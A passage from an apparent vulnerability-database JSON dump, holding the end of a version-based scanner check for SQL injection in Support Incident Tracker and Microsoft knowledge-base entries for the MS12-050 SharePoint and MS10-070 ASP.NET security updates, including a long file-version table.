script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"support_incident_tracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"sit/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/518999\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/103442/PT-2011-25.txt\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to improper input validation in 'tasks.php',\n 'report_marketing.php', 'search.php' and 'billable_incidents.php' scripts\n via various parameters before being used in a SQL query.\");\n script_tag(name:\"solution\", value:\"Upgrade to Support Incident Tracker SiT! version 3.64 or later.\");\n script_tag(name:\"summary\", value:\"This host is running Support Incident Tracker and is prone to SQL\n injection vulnerabilities.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to manipulate SQL queries by\n injecting arbitrary SQL code.\");\n script_tag(name:\"affected\", value:\"Support Incident Tracker version prior 3.63p1 and prior.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://sitracker.org/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less_equal( version:vers, test_version:\"3.63.p1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"3.64\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mskb": [{"lastseen": "2021-01-01T22:36:19", "bulletinFamily": "microsoft", "cvelist": [], "description": "<html><body><p>Describes the security update for SharePoint Server 2010 (coreserverloc), that was released on July 10, 2012.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-050. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201207.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201207.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-050\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-050</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Known issues with this security update</h4><ul class=\"sbody-free_list\"><li>After you install this security update on all SharePoint servers, you will have to run the PSconfig tool to complete the installation. For more information about how to use the PSconfig tool, visit the following TechNet webpage: <div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/cc263093.aspx\" id=\"kb-link-8\" target=\"_self\">PSconfig command-line reference (SharePoint Server 2010)</a><br/></div></li></ul></div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Prerequisites to apply this security update</h4>To install this security update, you must have Microsoft SharePoint Server 2010 Service Pack 1 (SP1) installed on the computer.<br/><br/>For more information about how to obtain the service pack, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2460045\" id=\"kb-link-10\">2460045 </a> Description of SharePoint Server 2010 SP1</div></div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Restart information</h4>You may have to restart the computer after you install this security update.</div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Security update replacement information</h4>This security update replaces the following security update:<div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2508964\" id=\"kb-link-11\">2508964 </a>\u00a0MS11-074: Description of the security update for Microsoft Office SharePoint Server 2007 (coreserver.msp): September 13, 2011</div></div><h2></h2><div class=\"kb-summary-section section\"><h4 class=\"sbody-h4\">File information</h4>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel.<br/><h5 class=\"sbody-h5 text-subtitle\">For all supported versions of SharePoint Server 2010</h5><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreserver-x-none.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">5,654</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-ar-sa.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-bg-bg.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-ca-es.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-cs-cz.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-da-dk.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-de-de.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-el-gr.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-en-us.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">3,579</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-es-es.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-et-ee.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-eu-es.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-fi-fi.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-fr-fr.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-gl-es.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-he-il.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-hi-in.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-hr-hr.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">6,225</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-hu-hu.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-it-it.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-ja-jp.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-kk-kz.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-ko-kr.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-lt-lt.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:47</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-lv-lv.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-nb-no.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-nl-nl.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-pl-pl.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-pt-br.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-pt-pt.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-ro-ro.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-ru-ru.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-sk-sk.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-sl-si.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-sr-latn-cs.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-sv-se.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-th-th.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-tr-tr.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:51</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-uk-ua.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-zh-cn.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Coreservermui-zh-tw.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,902</td><td class=\"sbody-td\">05-Apr-2012</td><td class=\"sbody-td\">06:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Cssportalstyle_css_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">62,527</td><td class=\"sbody-td\">08-Feb-2011</td><td class=\"sbody-td\">22:59</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dlccore_llcc.resx_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">45,611</td><td class=\"sbody-td\">31-Mar-2011</td><td class=\"sbody-td\">04:29</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dlcmossact_actions_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">371,127</td><td class=\"sbody-td\">13-Apr-2011</td><td class=\"sbody-td\">23:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawfap.dll</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">75,696</td><td class=\"sbody-td\">21-Jul-2011</td><td class=\"sbody-td\">04:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibdispform.aspx</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">14,074</td><td class=\"sbody-td\">20-Oct-2010</td><td class=\"sbody-td\">21:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibeawfdoclib.master</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">32,518</td><td class=\"sbody-td\">30-Mar-2011</td><td class=\"sbody-td\">11:20</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibeditdlg.htm</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">5,041</td><td class=\"sbody-td\">04-Apr-2012</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibeditform.aspx</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">14,074</td><td class=\"sbody-td\">20-Oct-2010</td><td class=\"sbody-td\">21:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibfiledlg.htm</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">4,351</td><td class=\"sbody-td\">04-Apr-2012</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibschema.xml</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">66,195</td><td class=\"sbody-td\">17-Nov-2011</td><td class=\"sbody-td\">07:43</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawffeaturedoclibupload.aspx</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">15,914</td><td class=\"sbody-td\">20-Oct-2010</td><td class=\"sbody-td\">21:57</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawfschedules.dll</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">71,552</td><td class=\"sbody-td\">21-Jul-2011</td><td class=\"sbody-td\">04:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Eawfsharedlib.dll</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">165,776</td><td class=\"sbody-td\">21-Jul-2011</td><td class=\"sbody-td\">04:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.office.eaworkflowsoap.dll</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">30,616</td><td class=\"sbody-td\">21-Jul-2011</td><td class=\"sbody-td\">04:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Notesstp.exe.oss.1028</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">558,944</td><td class=\"sbody-td\">21-Jul-2011</td><td class=\"sbody-td\">20:55</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Osgmsg.dll_1028</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">252,832</td><td class=\"sbody-td\">22-Jul-2011</td><td class=\"sbody-td\">03:17</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Osgmsgp.dll_1028</td><td class=\"sbody-td\">14.0.6108.5000</td><td class=\"sbody-td\">113,536</td><td class=\"sbody-td\">22-Jul-2011</td><td class=\"sbody-td\">03:17</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Osrvmanifest.man_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,040,231</td><td class=\"sbody-td\">21-Jul-2011</td><td class=\"sbody-td\">04:04</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Oss.search.intlr.dll.1028</td><td class=\"sbody-td\">14.0.6015.1000</td><td class=\"sbody-td\">587,640</td><td class=\"sbody-td\">22-Dec-2010</td><td class=\"sbody-td\">23:30</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Osvintlr.dll_1028</td><td class=\"sbody-td\">14.0.6015.1000</td><td class=\"sbody-td\">227,200</td><td class=\"sbody-td\">22-Dec-2010</td><td class=\"sbody-td\">23:02</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reviewapproval_llcc.xoml.rules_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">109,039</td><td class=\"sbody-td\">11-Mar-2011</td><td class=\"sbody-td\">12:06</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reviewapproval_llcc.xoml_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">104,934</td><td class=\"sbody-td\">13-Apr-2011</td><td class=\"sbody-td\">23:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reviewfeedback_llcc.xoml.rules_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">42,965</td><td class=\"sbody-td\">11-Mar-2011</td><td class=\"sbody-td\">12:06</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reviewfeedback_llcc.xoml_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">92,950</td><td class=\"sbody-td\">13-Apr-2011</td><td class=\"sbody-td\">23:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reviewpublishing_llcc.xoml.rules_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">109,039</td><td class=\"sbody-td\">11-Mar-2011</td><td class=\"sbody-td\">12:06</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reviewpublishing_llcc.xoml_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">104,934</td><td class=\"sbody-td\">13-Apr-2011</td><td class=\"sbody-td\">23:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sppubint_res.dll_1028</td><td class=\"sbody-td\">14.0.6009.1000</td><td class=\"sbody-td\">206,712</td><td class=\"sbody-td\">22-Oct-2010</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spscore.rsx_1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">84,024</td><td class=\"sbody-td\">02-Mar-2011</td><td class=\"sbody-td\">23:39</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spsintlr.dll_1028</td><td class=\"sbody-td\">14.0.6015.1000</td><td class=\"sbody-td\">1,157,008</td><td class=\"sbody-td\">22-Dec-2010</td><td class=\"sbody-td\">23:35</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Srchwebt.xml.1028</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,634</td><td class=\"sbody-td\">20-Jan-2011</td><td class=\"sbody-td\">17:04</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ssetupui.dll_1028</td><td class=\"sbody-td\">14.0.6120.5000</td><td class=\"sbody-td\">39,544</td><td class=\"sbody-td\">04-Apr-2012</td><td class=\"sbody-td\">22:52</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div></div></body></html>", "edition": 2, "modified": "2012-07-10T17:14:04", "id": "KB2553194", "href": "https://support.microsoft.com/en-us/help/2553194/", "published": "2012-07-10T00:00:00", "title": "MS12-050: Description of the security update for SharePoint Server 2010 (coreserverloc): July 10, 2012", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-01T22:41:55", "bulletinFamily": "microsoft", "cvelist": [], "description": "<html><body><p>Resolves a vulnerability in ASP.NET that could allow information disclosure. An attacker that successfully exploited this vulnerability could read data, such as the view state, which was encrypted by the server.</p><h2></h2><div class=\"kb-notice-section section\"><span class=\"text-base\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-1\" target=\"_self\">Support is ending for some versions of Windows</a></span>.</div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-070. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201009.aspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201009.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-3\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-070.mspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS10-070.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\">For more information about how to configure legacy encryption mode in ASP.NET, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div 